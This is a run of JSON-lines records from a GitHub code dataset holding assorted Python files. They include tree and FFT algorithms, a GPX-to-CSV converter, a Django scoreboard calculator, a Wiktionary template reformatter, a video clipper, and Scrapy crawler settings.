main()\n","repo_name":"project-ncl/bacon","sub_path":"bacon_install.py","file_name":"bacon_install.py","file_ext":"py","file_size_in_byte":11706,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"73365921972","text":"# Construct BST from preorder traversal\n# function takes preorder traversal\n\nclass Node: \n\tdef __init__(self, data = 0): \n\t\tself.data = data \n\t\tself.left = None\n\t\tself.right = None\n\nclass BinaryTree : \n\tdef constructTree(self, pre): \n\t\tsize=len(pre)\n\t\troot = Node(pre[0]) \n\t\ts = [] \n\t\ts.append(root) \n\t\ti = 1\n\t\twhile ( i < size): \n\t\t\ttemp = None\n\n\t\t\twhile (len(s) > 0 and pre[i] > s[-1].data): \n\t\t\t\ttemp = s.pop() \n\t\t\t\n\t\t\tif (temp != None): \n\t\t\t\ttemp.right = Node(pre[i]) \n\t\t\t\ts.append(temp.right) \n\t\t\t\n\t\t\telse : \n\t\t\t\ttemp = s[-1] \n\t\t\t\ttemp.left = Node(pre[i]) \n\t\t\t\ts.append(temp.left) \n\t\t\ti = i + 1\n\t\treturn root ","repo_name":"bhatnitish1998/aps-2020","sub_path":"BST_from_preorder.py","file_name":"BST_from_preorder.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20186957449","text":"\n'''==========================================================\nCode by G V V Sharma\nMay 27, 2023,\nReleased under GNU/GPL\nhttps://www.gnu.org/licenses/gpl-3.0.en.html\n=========================================================='''\n \n#Spectrum of message signal using own FFT algorithm.\n \nimport numpy as np\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\n\ndef fft(x):\n N = len(x)\n if N == 1:\n return x\n else:\n X_even = fft(x[::2])\n X_odd = fft(x[1::2])\n factor = np.exp(-2j * np.pi * np.arange(N) / N)\n return np.concatenate([X_even + factor[:N//2] * X_odd,\n X_even + factor[N//2:] * X_odd])\n\nsample_rate, audio_data = wavfile.read(\"fm/input-audio/Sound.wav\")\n\n# Zero padding\nN = len(audio_data)\nnextpow2 = int(np.ceil(np.log2(N)))\naudio_data = np.pad(audio_data, (0, 2**nextpow2-N), mode='constant')\n\ni = fft(audio_data)\nf_i = np.fft.fftfreq(len(audio_data), d=1/sample_rate)\n\nplt.plot(f_i, np.abs(i))\nplt.xlabel('Frequency (Hz)')\nplt.ylabel('Magnitude')\nplt.title('Message Signal')\nplt.savefig(\"fm/msg/figs/FFTalgorithm.pdf\")\nplt.show()\n\n","repo_name":"gadepall/signal-processing","sub_path":"fm/msg/codes/FFTalgorithm.py","file_name":"FFTalgorithm.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8778920396","text":"import argparse\nimport csv\nimport logging\nimport os\nimport sys\nimport xml.etree.ElementTree as ET\n\n# Configure a logger\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n####\n# Prompts the user for a yes no answer to a question\n#\n# PARAMS:\n# question: The question to ask the user\n# default: The default response to the question\n####\ndef getYesNo(question, default=\"yes\"):\n valid = {\"yes\": True, \"y\": True, \"ye\": True, \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"Invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = raw_input().lower()\n if default is None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with a 'yes' or 'no' (or 'y' or 'n').\\n\")\n\n####\n# Parses the GPX to get all of the waypoints\n#\n# Returns a list of waypoints and their attributes\n####\ndef parseGPX(gpx_path):\n # Setup the GPX namespace\n namespace = {\"gpx\": \"http://www.topografix.com/GPX/1/1\"}\n\n # Start parsing the GPX XML\n gpxTree = ET.parse(gpx_path)\n root = gpxTree.getroot()\n\n # Create list to store the GPX items\n waypoints = []\n\n # Iterate over all of the waypoints\n for waypoint in root.findall(\"gpx:wpt\", namespace):\n wpt = {'lat': waypoint.attrib['lat'], 'lon': waypoint.attrib['lon'], 'ele': '', 'time': '', 'name': '', 'desc': ''}\n\n for item in waypoint:\n if item.tag == \"{http://www.topografix.com/GPX/1/1}ele\":\n wpt['ele'] = item.text.encode('utf-8')\n if item.tag == '{http://www.topografix.com/GPX/1/1}time':\n wpt['time'] = item.text.encode('utf-8')\n if item.tag == '{http://www.topografix.com/GPX/1/1}name':\n wpt['name'] = item.text.encode('utf-8')\n if item.tag == '{http://www.topografix.com/GPX/1/1}desc':\n wpt['desc'] = item.text.encode('utf-8')\n\n waypoints.append(wpt)\n\n return waypoints\n\n\n####\n# Coverts the GPX file to a CSV file\n####\ndef convertGPX(gpx_path, csv_path, overwriteCSV=False):\n if os.path.isfile(csv_path) and not overwriteCSV:\n logger.error(csv_path + \" already exists. Exiting...\")\n sys.exit() # Nothing we can do here\n if not os.path.isfile(gpx_path):\n logger.error(gpx_path + \" does not exis.encode('utf-8')t. Exiting...\")\n sys.exit() # Nothing to work with!\n\n if os.path.isfile(csv_path):\n os.remove(csv_path)\n\n # Get the waypoints from the GPX file\n waypoints = parseGPX(gpx_path)\n\n # Write the data to CSV\n csvFields = ['name', 'lat', 'lon', 'ele', 'desc', 'time']\n\n with open(csv_path, 'w') as csvFile:\n writer = csv.DictWriter(csvFile, fieldnames = csvFields)\n writer.writeheader()\n\n writer.writerows(waypoints)\n\n\n# Handle the command line arguments\nparser = argparse.ArgumentParser(description=\"A simple utility to convert GPX files to a CSV file.\")\nparser.add_argument(\"--input\", dest=\"gpx_path\", help=\"Path to the GPX file\")\nparser.add_argument(\"--output\", dest=\"csv_path\", help=\"Path to the resulting CSV file\")\nargs = parser.parse_args()\n\n# Rather or not to overwrite an existing CSV file\noverwriteCSV = False\n\nif not args.gpx_path or not args.csv_path:\n logger.error(\"You must supply an input and output!\")\nelif not os.path.isfile(args.gpx_path):\n logger.error(\"The input GPX file \" + args.gpx_path + \" does not exist\")\nelif os.path.isfile(args.csv_path):\n if getYesNo(\"'%s' exists. Overwrite it?\" % args.csv_path):\n overwriteCSV = True\n else:\n # Output already exists and user doesn't want to overwrite it, exit...\n sys.exit()\nelse:\n logger.info(\"Converting GPX file \" + args.gpx_path + \" to a CSV file...\")\n convertGPX(args.gpx_path, args.csv_path, overwriteCSV)\n","repo_name":"serialphotog/gpx2csv","sub_path":"gpx2csv.py","file_name":"gpx2csv.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28627262844","text":"from functools import reduce\nimport json\nfrom typing import Dict, List, NamedTuple, Optional\n\nfrom django.contrib.auth import get_user_model\nfrom django.utils import timezone\n\nfrom problem.models import ProblemInstance, ProblemAuthLog\n\nUser = get_user_model()\n\n\ndef calculate_problem_score(problem_instance, effective_solve_count, is_first_solve):\n points = problem_instance.points\n if effective_solve_count != 0:\n points += problem_instance.distributed_points // effective_solve_count\n points += problem_instance.breakthrough_points if is_first_solve else 0\n return points\n\n\nclass ProblemState(NamedTuple):\n solve_count: int\n first_solve: Optional[User]\n\n\nclass UserState(NamedTuple):\n solved_problems: List[ProblemInstance]\n last_auth: Optional[timezone.datetime]\n\n\nclass ReplayState(NamedTuple):\n datetime: Optional[timezone.datetime]\n user_states: Dict[User, UserState]\n problem_states: Dict[ProblemInstance, ProblemState]\n\n\nclass AuthReplay:\n def __init__(self, problem_list, crunch_timedelta):\n self.problem_list = problem_list\n self.problem_instances = problem_list.probleminstance_set\n self.state = ReplayState(\n datetime=None,\n user_states={},\n problem_states={}\n )\n self.crunch_timedelta = crunch_timedelta\n\n def process_preparation(self, logs, datetime):\n problem_states = self.state.problem_states\n user_states = self.state.user_states\n solved_log_queries = []\n\n # Collect correct auth log query (solved_log_queries) and update problem state (last line) per problem instance\n for problem_instance in self.problem_instances.all():\n correct_auth_key = problem_instance.problem.auth_key\n solve_logs = logs.filter(problem_instance=problem_instance, auth_key=correct_auth_key)\n solved_log_queries.append(solve_logs)\n\n first_solve_log = solve_logs.first() if solve_logs.exists() else None\n solve_count = solve_logs.count()\n\n first_solve_user = first_solve_log.user if first_solve_log is not None else None\n\n previous_state = problem_states.get(problem_instance, ProblemState(0, None))\n new_state = \\\n ProblemState(\n solve_count=previous_state.solve_count + solve_count,\n first_solve=first_solve_user if previous_state.first_solve is None else previous_state.first_solve\n )\n\n problem_states[problem_instance] = new_state\n\n solve_logs = \\\n reduce(lambda x, y: x | y, solved_log_queries, ProblemAuthLog.objects.none()) \\\n .order_by('datetime')\n user_pks_with_logs = solve_logs.values_list('user', flat=True)\n users_with_logs = User.objects.filter(pk__in=user_pks_with_logs)\n\n # Update user state per user who has a correct auth logs for problem list\n for user in users_with_logs:\n previous_state = user_states.get(user, UserState([], None))\n user_solve_logs = solve_logs.filter(user=user)\n solved_problem_pks = user_solve_logs.values_list('problem_instance', flat=True)\n solved_problems = ProblemInstance.objects.filter(pk__in=solved_problem_pks)\n last_auth = user_solve_logs.last().datetime\n\n user_states[user] = UserState(\n solved_problems=previous_state.solved_problems + list(solved_problems),\n last_auth=last_auth\n )\n\n self.state = ReplayState(\n datetime=datetime,\n user_states=user_states,\n problem_states=problem_states\n )\n\n def prepare(self):\n datetime_pivot = timezone.now() - self.crunch_timedelta\n logs = ProblemAuthLog.objects \\\n .filter(problem_instance__in=self.problem_instances.all(), datetime__lte=datetime_pivot) \\\n .order_by('datetime')\n\n if self.state.datetime is not None:\n logs = logs.filter(datetime__gt=self.state.datetime)\n\n self.process_preparation(logs, datetime_pivot)\n\n def update_points_function(self, points_functions, problem_instance, state_diffs):\n problem_state = self.state.problem_states[problem_instance]\n problem_state_diff = state_diffs.get(problem_instance, None)\n solve_count = problem_state.solve_count\n first_solver = problem_state.first_solve\n\n if problem_state_diff is not None:\n solve_count += problem_state_diff.solve_count\n if first_solver is None:\n first_solver = problem_state_diff.first_solve\n\n if solve_count == 0:\n return\n\n points_functions[problem_instance] = \\\n lambda user: calculate_problem_score(problem_instance, solve_count, user == first_solver)\n\n def calc_user_points(self, user, problem_instance, points_functions, state_diffs):\n user_state = self.state.user_states.get(user, UserState([], None))\n user_state_diff = state_diffs.get(user, UserState([], None))\n all_solved_problems = user_state.solved_problems + user_state_diff.solved_problems\n\n if problem_instance not in all_solved_problems:\n return 0\n\n return points_functions[problem_instance](user)\n\n def get_statistic_data(self):\n if self.state.datetime is None:\n return [], []\n\n problem_state_diffs = {}\n user_state_diffs = {}\n\n points_functions = {}\n user_points = {}\n\n for problem_instance in self.state.problem_states:\n self.update_points_function(points_functions, problem_instance, problem_state_diffs)\n\n for user, state in self.state.user_states.items():\n # pylint: disable=cell-var-from-loop\n user_points[user] = \\\n sum(map(\n lambda x: self.calc_user_points(user, x, points_functions, user_state_diffs),\n state.solved_problems))\n\n datetime_pivot = self.state.datetime\n\n logs = ProblemAuthLog.objects \\\n .filter(\n problem_instance__in=self.problem_instances.all(),\n datetime__gt=datetime_pivot)\n solved_log_queries = []\n for problem_instance in self.problem_instances.all():\n correct_auth_key = problem_instance.problem.auth_key\n solve_logs = logs.filter(problem_instance=problem_instance, auth_key=correct_auth_key)\n solved_log_queries.append(solve_logs)\n\n logs_to_replay = \\\n reduce(lambda x, y: x | y, solved_log_queries, ProblemAuthLog.objects.none()) \\\n .order_by('datetime')\n\n def append_chart(timestamp):\n for chart_user, points in user_points.items():\n entry = chart_data.get(chart_user.username, [])\n entry.append({'x': timestamp.isoformat(), 'y': points})\n chart_data[chart_user.username] = entry\n\n chart_data = {}\n append_chart(datetime_pivot)\n\n for log in logs_to_replay:\n for user in user_points:\n user_points[user] -= self.calc_user_points(\n user, log.problem_instance, points_functions, user_state_diffs)\n\n prev_problem_state = problem_state_diffs.get(log.problem_instance, ProblemState(0, None))\n problem_state_diffs[log.problem_instance] = \\\n ProblemState(\n solve_count=prev_problem_state.solve_count + 1,\n first_solve=prev_problem_state.first_solve\n if prev_problem_state.first_solve is not None else\n log.user\n )\n self.update_points_function(points_functions, log.problem_instance, problem_state_diffs)\n\n for user in user_points:\n user_points[user] += self.calc_user_points(\n user, log.problem_instance, points_functions, user_state_diffs)\n\n prev_user_state = user_state_diffs.get(log.user, UserState([], None))\n user_state_diffs[log.user] = \\\n UserState(\n solved_problems=prev_user_state.solved_problems + [log.problem_instance],\n last_auth=log.datetime\n )\n prev_point = user_points.get(log.user, 0)\n user_points[log.user] = prev_point + self.calc_user_points(\n log.user, log.problem_instance, points_functions, user_state_diffs)\n\n append_chart(log.datetime)\n\n append_chart(timezone.now())\n\n def get_user_last_auth(rank_user):\n user_state_diff = user_state_diffs.get(rank_user, None)\n return self.state.user_states[rank_user].last_auth \\\n if user_state_diff is None else \\\n user_state_diff.last_auth\n\n rank_raw = list(map(lambda x: (x[0].username, x[1], get_user_last_auth(x[0])), user_points.items()))\n top10_rank = sorted(rank_raw, key=lambda x: (-x[1], x[2]))[:10]\n top10_users = list(map(lambda x: x[0], top10_rank))\n top10_chart_data = \\\n map(lambda x: (x[0], json.dumps(x[1])),\n filter(lambda x: x[0] in top10_users, chart_data.items()))\n\n return top10_chart_data, top10_rank\n","repo_name":"PLUS-POSTECH/study.plus.or.kr","sub_path":"src/problem/helpers/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":9240,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"39473049726","text":"\"\"\"\n Calc pi\n\"\"\"\n\ndef calc_pi(nterms: int) -> float:\n NUMERATOR: float = 4.0\n INCREMENT: float = 2.0\n FLIPSIGN: float = -1.0\n demoninator: float = 1.0\n operation: float = 1.0\n pi: float = 0.0\n\n for _ in range(nterms):\n pi += operation * (NUMERATOR / demoninator)\n demoninator += INCREMENT\n operation *= FLIPSIGN\n\n return pi\n\nif __name__ == \"__main__\":\n print(calc_pi(4000))\n\n\n","repo_name":"riki900/compsci","sub_path":"code/chapter1/calc_pi.py","file_name":"calc_pi.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43370730512","text":"#!/usr/bin/env python3\nimport os\nimport requests\nimport re\nimport sys\n\nTEMPLATE_URL = 'https://en.wiktionary.org/w/index.php?title=Module:zh/data/dial-syn&action=raw'\nTEMPLATE_LOCAL_PATH = '/tmp/zh-dial-syn-template.txt'\n\nlines_ignore = [\n\t'local export = {}',\n\t'export.list = {',\n\t'}',\n\t'return export',\n\t'\\t',\n\t'',\n]\n\n'''\nErutuon:\nidea: temporarily collect comment lines and\nassociate them with the next content line with a dict\n(where keys are content lines and values are lists of preceding comments), then\ninsert them into lines before the content lines in the \"recall line\" loop\n\nin the two examples above,\nthe rough equivalent of `comments['export.list = {'] = ['-- th = 趿; s = 靸 (except Hainan, where s -> t; Min Dong)']`\nwould have to happen somehow in the \"sort\" loop, and then\nin the \"recall line\" loop, `if line in comments: lines[i] = \"\\n\".join(comments[line]) + \"\\n\" + lines[i]`\n\nif current line is comment,\ninsert into current_comments, otherwise if\ncurrent_comments is not empty,\ncomments[line] = current_comments and empty current_comments;\nassuming nobody adds a comment on the last line for some reason\n'''\n\n# ----\n\ndef main(page):\n\t# collection of lines.\n\t# if global and this is used as a module,\n\t# this is not cleared on every invocation if it is global\n\t# and words carry over. blargh\n\tcollection = {\n\t\t'content': {},\n\t\t'comments': [],\n\t\t'other': [],\n\t}\n\n\ttemplate_content = None\n\tif not os.path.exists(TEMPLATE_LOCAL_PATH):\n\t\twith open(TEMPLATE_LOCAL_PATH, mode = 'x', encoding = 'utf-8') as file:\n\t\t\tprint('Downloading template...')\n\t\t\ttemplate_content = requests.get(TEMPLATE_URL).content.decode('utf-8')\n\t\t\tfile.write(template_content)\n\telse:\n\t\twith open(TEMPLATE_LOCAL_PATH, mode = 'r', encoding = 'utf-8') as file:\n\t\t\tprint('Loaded template from local.')\n\t\t\ttemplate_content = file.read()\n\n\t#deprecated = ['Sabah', 'Luchuan', 'Doumen', 'Huidong']\n\n\t# ----\n\n\t# fix tabs\n\tpage.text = re.sub(r'^ {4}', r'\\t', page.text, flags = re.M)\n\n\t# load text\n\tlines = page.text.splitlines()\n\n\t# sort lines into content, ignore, and other\n\tfor i, line in enumerate(lines):\n\t\t# trim whitespace, right\n\t\tline = line.rstrip()\n\n\t\tif re.findall(r'^\\t(--)?\\[', line):\n\t\t\tis_comment = re.search(r'^\\t--\"', line)[1]\n\t\t\tlocation = re.search(r'\"([^\"]+)\"', line)[1]\n\t\t\tline = re.search(r' *= *(.+)$', line)[1]\n\n\t\t\t# add commas\n\t\t\tline = re.sub(r'(\\})( *--.+|)$', r'\\1,\\2', line)\n\n\t\t\tcollection['content'][location] = (is_comment, line)\n\t\telif re.findall(r'^\\t*--', line):\n\t\t\tcollection['comments'].append((lines[i], lines[i], lines[i+1]))\n\t\telif line in lines_ignore:\n\t\t\tpass\n\t\telse:\n\t\t\tcollection['other'].append(line)\n\n\t# ----\n\n\tlines = template_content.splitlines()\n\n\t# recall line\n\tfor i, line in enumerate(lines):\n\t\tif re.findall(r'^\\t(--)?\\[', line):\n\t\t\t_ = re.findall(r'\"([^\"]+)\"', line)\n\t\t\tlocation = _[0]\n\t\t\tif location in collection['content']:\n\t\t\t\tlines[i] = re.sub(r'(= )(.+)$', r'\\1', lines[i])\n\t\t\t\tlines[i] += collection['content'][location]\n\n\t\t\t\t# detect lines that were not recalled\n\t\t\t\t# such as misspelled locations\n\t\t\t\tcollection['content'].pop(location)\n\n\tpage.text = '\\n'.join(lines)\n\n\t# deprecated locations\n\t# regex abuse :))\n\t#page.text = re.sub(r'\\n\\t--\\[\"[A-Za-z]+\"\\]\\t+= { \"\" },\\n', r'\\n', page.text)\n\n\t# print lines that were not recalled\n\tif len(collection['content']) > 0:\n\t\twith open('leftover.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['content']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['content'])\n\t\tinput()\n\n\t# print comments that were not recalled\n\tif len(collection['comments']) > 0:\n\t\twith open('comments.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['comments']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['comments'])\n\t\tinput()\n\n\t# print other lines\n\tif len(collection['other']) > 0:\n\t\twith open('other.txt', mode = 'a', encoding = 'utf-8') as file:\n\t\t\tfile.write('####\\n')\n\t\t\tfile.write(page.title() + '\\n')\n\t\t\tfor line in collection['other']:\n\t\t\t\tfile.write(line + '\\n')\n\t\t\tfile.write('####' + '\\n')\n\t\tprint(collection['other'])\n\t\tinput()\n\n\treturn page\n\nif __name__ == '__main__':\n\t# dummy object\n\t# https://stackoverflow.com/a/2827664\n\tclass ObjectFoo(object):\n\t\tpass\n\tpage = ObjectFoo()\n\tdef _():\n\t\treturn 'Project:Foobar'\n\tpage.title = _\n\n\twith open(sys.argv[1], mode = 'r', encoding = 'utf-8') as file:\n\t\tpage.text = file.read()\n\tpage = main(page)\n\tprint(page.text)\n","repo_name":"szc126/misc","sub_path":"script/wiktionary/zhdialsyn.py","file_name":"zhdialsyn.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4207808684","text":"class Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n\n result = []\n self.dfs(candidates, target, [], result)\n return result\n\n\n def dfs(self, candidates, target, path, result):\n if target == 0:\n # the path perfectly adds up to the target\n result.append(path)\n return\n elif target < 0:\n # the path does not lead to the target\n return\n else:\n for i in range(len(candidates)):\n self.dfs(candidates[i:], target - candidates[i], path + [candidates[i]], result)\n \n","repo_name":"vincehientran/Leetcode","sub_path":"Medium/CombinationSum.py","file_name":"CombinationSum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32999658780","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\nfrom setuptools import setup\n\n\nif sys.argv[-1] == \"publish\":\n os.system(\"python setup.py sdist bdist_wheel upload\")\n sys.exit()\n\nrequired = [\n 'humanize',\n 'pytz',\n 'dateparser',\n 'iso8601',\n 'python-dateutil'\n 'ruamel.yaml'\n]\n\nsetup(\n name='maya',\n version='0.1.1',\n description='Datetimes for Humans.',\n long_description=open('README.rst').read(),\n author='Kenneth Reitz',\n author_email='me@kennethreitz.com',\n url='https://github.com/kennethreitz/maya',\n py_modules=['maya'],\n install_requires=required,\n license='MIT',\n classifiers=(\n\n ),\n)\n","repo_name":"smithjc76/maya","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"23246568916","text":"BOT_NAME = 'capitalbankmk'\n\nSPIDER_MODULES = ['capitalbankmk.spiders']\nNEWSPIDER_MODULE = 'capitalbankmk.spiders'\nFEED_EXPORT_ENCODING = 'utf-8'\nLOG_LEVEL = 'ERROR'\nDOWNLOAD_DELAY = 0\n\nROBOTSTXT_OBEY = True\n\nITEM_PIPELINES = {\n\t'capitalbankmk.pipelines.CapitalbankmkPipeline': 100,\n\n}\n\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'\n","repo_name":"hristo-grudev/capitalbankmk","sub_path":"capitalbankmk/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30627301965","text":"import argparse\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport multiprocessing\r\n\r\nimport VideoFrameConversion as vfc\r\n\r\ndef get_files(path):\r\n # read a folder, return the complete path\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n ret.append(os.path.join(root, filespath))\r\n return ret\r\n\r\ndef get_jpgs(path):\r\n # read a folder, return the image name\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n ret.append(filespath)\r\n return ret\r\n\r\ndef text_save(content, filename, mode = 'a'):\r\n # save a list to a txt\r\n # Try to save a list variable in txt file.\r\n file = open(filename, mode)\r\n for i in range(len(content)):\r\n file.write(str(content[i]) + '\\n')\r\n file.close()\r\n\r\ndef check_path(path):\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n\r\ndef process_video(opt):\r\n # video statics\r\n fps, frames, time, width, height = vfc.get_video_info(opt.videopath)\r\n fps = round(fps)\r\n width = int(width)\r\n height = int(height)\r\n print(\"corrected video fps =\", fps)\r\n print(\"corrected video width =\", width)\r\n print(\"corrected video height =\", height)\r\n\r\n # time range\r\n if time % opt.small_video_second > 0:\r\n small_video_num = time // opt.small_video_second + 1\r\n else:\r\n small_video_num = time // opt.small_video_second\r\n small_video_num = int(small_video_num)\r\n print('There are %d small videos output' % (small_video_num))\r\n small_video_frame_num = opt.small_video_second * fps\r\n print('Each small video contains %d frames' % (small_video_frame_num))\r\n\r\n # name of small videos\r\n namelist = []\r\n for i in range(small_video_num):\r\n name = opt.videopath.split('\\\\')[-1][:-4] + '_small_' + str(i) + '.mp4'\r\n namelist.append(name)\r\n print(namelist)\r\n\r\n # clip small videos\r\n vc = cv2.VideoCapture(opt.videopath)\r\n for v in range(small_video_num):\r\n # create a video writer\r\n fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\r\n print('Saving folder:', opt.savepath)\r\n check_path(opt.savepath)\r\n savepath = os.path.join(opt.savepath, namelist[v])\r\n video = cv2.VideoWriter(savepath, fourcc, fps, (width, height))\r\n for f in range(small_video_frame_num):\r\n print('This is the %d-th small video, %d-th frame' % (v, f))\r\n rval, frame = vc.read()\r\n if rval == False:\r\n video.release()\r\n video.write(frame)\r\n video.release()\r\n \r\n # release the video\r\n vc.release()\r\n cv2.destroyAllWindows()\r\n print('Released!')\r\n\r\ndef process_video_by_path(opt, videopath):\r\n # video statics\r\n fps, frames, time, width, height = vfc.get_video_info(videopath)\r\n fps = round(fps)\r\n width = int(width)\r\n height = int(height)\r\n print(\"corrected video fps =\", fps)\r\n print(\"corrected video width =\", width)\r\n print(\"corrected video height =\", height)\r\n\r\n # time range\r\n if time % opt.small_video_second > 0:\r\n small_video_num = time // opt.small_video_second + 1\r\n else:\r\n small_video_num = time // opt.small_video_second\r\n small_video_num = int(small_video_num)\r\n print('There are %d small videos output' % (small_video_num))\r\n small_video_frame_num = opt.small_video_second * fps\r\n print('Each small video contains %d frames' % (small_video_frame_num))\r\n\r\n # name of small videos\r\n namelist = []\r\n for i in range(small_video_num):\r\n name = videopath.split('\\\\')[-1][:-4] + '_small_' + str(i) + '.mp4'\r\n namelist.append(name)\r\n print(namelist)\r\n\r\n # clip small videos\r\n vc = cv2.VideoCapture(videopath)\r\n for v in range(small_video_num):\r\n # create a video writer\r\n fourcc = cv2.VideoWriter_fourcc('m','p','4','v')\r\n print('Saving folder:', opt.savepath)\r\n check_path(opt.savepath)\r\n savepath = os.path.join(opt.savepath, namelist[v])\r\n video = cv2.VideoWriter(savepath, fourcc, fps, (width, height))\r\n for f in range(small_video_frame_num):\r\n if f % (small_video_frame_num // 10) == 0:\r\n print('This is the %d-th small video, %d-th frame' % (v, f))\r\n rval, frame = vc.read()\r\n if rval == False:\r\n video.release()\r\n video.write(frame)\r\n video.release()\r\n \r\n # release the video\r\n vc.release()\r\n cv2.destroyAllWindows()\r\n print('Released!')\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Define parameters\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--multiprocess', type = bool, default = True, help = 'whether to use multiprocess or not')\r\n parser.add_argument('--small_video_second', type = int, default = 120, help = 'interval of second')\r\n parser.add_argument('--processes_num', type = int, default = 4, help = 'number of CPU used for processing')\r\n parser.add_argument('--videopath', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\video_processed_v2\\\\clip1\\\\interp_1_exposure_type_1.mp4', \\\r\n help = 'video path')\r\n parser.add_argument('--video_folder_path', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\video_processed_v2\\\\clip5', \\\r\n help = 'video folder path')\r\n parser.add_argument('--savepath', type = str, \\\r\n default = 'F:\\\\Deblur\\\\data collection\\\\clip5_small_videos', \\\r\n #default = 'F:\\\\Deblur\\\\Short-Long RGB to RGB Mapping\\\\data\\\\slrgb2rgb_v1', \\\r\n help = 'save path')\r\n opt = parser.parse_args()\r\n print(opt)\r\n\r\n # Process videos\r\n if opt.multiprocess:\r\n\r\n # build video list\r\n videolist = get_jpgs(opt.video_folder_path)\r\n for i in range(len(videolist)):\r\n print(i, videolist[i])\r\n videolist = get_files(opt.video_folder_path)\r\n\r\n # multiprocessing\r\n pool = multiprocessing.Pool(processes = opt.processes_num) # create multiprocessing operator\r\n for i in range(len(videolist)):\r\n pool.apply_async(process_video_by_path, (opt, videolist[i], ))\r\n pool.close() # close multiprocessing operator, which represents no processes can be added\r\n pool.join() # wait for all processed done, which should be run after close method\r\n print(\"Sub-processes all done\")\r\n\r\n else:\r\n process_video(opt)\r\n","repo_name":"zhaoyuzhi/Auto-Crop-Videos-and-Blur-Modelling","sub_path":"video_divider.py","file_name":"video_divider.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25784949582","text":"# Scrapy settings for scrapy_weibo project\n#\n# For simplicity, this file contains only the most important settings by\n# default. All the other settings are documented here:\n#\n# http://doc.scrapy.org/topics/settings.html\n#\n\nBOT_NAME = 'weiboSearchCrawler'\n\nSPIDER_MODULES = ['weiboSearchCrawler.spiders']\nNEWSPIDER_MODULE = 'weiboSearchCrawler.spiders'\n\n# scrapy_redis config\nREDIS_CONFIG = {\n 'host': '10.13.91.251',\n 'port': 6379,\n}\n\n# mysql config\nMYSQL_CONFIG = {\n \"db\": \"D-Insight-2\",\n \"user\": \"udms\",\n \"passwd\": \"123456\",\n \"host\": \"10.13.91.251\",\n \"port\": 3306,\n \"charset\": \"utf8\",\n}\n\n# mongodb config\nMONGO_CONFIG = {\n 'host': '10.13.91.251',\n 'port': 27017,\n}\n\n# Don't cleanup scrapy_redis queues, allows to pause/resume crawls.\nSCHEDULER_PERSIST = False\nQUEUE_KEY = '%(spider)s:requests'\nDUPEFILTER_KEY = '%(spider)s:dupefilter'\nSCHEDULER = \"weiboSearchCrawler.scrapy_redis.scheduler.Scheduler\"\n\n# pipelines config\nITEM_PIPELINES = {\n 'weiboSearchCrawler.pipelines.MongoDBPipeline': 50,\n}\n\nDOWNLOAD_DELAY = 10\nLOG_LEVEL = 'INFO'\n\n# read keywords from 'file' or 'utils'\nBOOTSTRAP = 'file'\n\n# fetch time range HISTORY or YESTERDAY\nFREQUENCY = 'YESTERDAY'\n# the range is in [FETCH_START, FETCH_END)\nFETCH_START = '2015-06-01'\nFETCH_END = 